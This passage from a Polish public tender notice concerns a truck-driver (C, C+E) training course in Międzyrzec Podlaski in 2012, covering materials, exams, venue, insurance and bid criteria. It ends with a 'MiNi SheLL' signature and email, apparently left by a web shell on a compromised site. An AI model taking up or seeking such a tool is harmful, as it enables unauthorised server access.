4.	Cel szkolenia	Celem szkolenia jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu oraz nabycie przez nich umiejętności.
5.	Materiały szkoleniowe	Autorskie materiały szkoleniowe przygotowane, powielone i przekazane uczestnikom szkoleń w formie podręcznika wielkości minimum A5 (przeniesienie autorskich praw majątkowych zgodnie z warunkami umowy). Ponadto każdy uczestnik szkolenia otrzyma notatnik i długopis. Wszystkie materiały szkoleniowe stają się własnością uczestnika szkolenia.
6.	Zaświadczenie 	-Wykonawca zapłaci za wykonanie badań lekarskich niezbędnych do wydania orzeczenia lekarskich stwierdzających brak przeciwwskazań zdrowotnych do kierowania pojazdami kat. C oraz C+E
- Wykonawca opłaci pierwszy egzamin państwowy w WORD. 
7.	Miejsce szkolenia	Szkolenie ma być zorganizowane i przeprowadzone na terenie miasta Międzyrzec Podlaski
8.	Warunki lokalowe i sprzętowe	Sale szkoleniowe oraz sprzęt użyty do przeprowadzenia kursu muszą być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217 poz. 1834 z 2005 r. z późn. zm.)
OZNAKOWANIE: sale szkoleniowe powinny być oznaczone zgodnie z aktualnymi wytycznymi MRR w zakresie informacji i promocji POKL.
9.	Ubezpieczenie	Wszyscy uczestnicy szkolenia zostaną objęci polisa NNW.
10.	Ewaluacja	Wykonawca wykona i przeprowadzi ewaluację szkolenia za pomocą ankiet ewaluacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8, 80.41.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświdczenie w organizacji szkolenia - 20</li>
<li>3. kwalifikacje kadry dydaktycznej - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com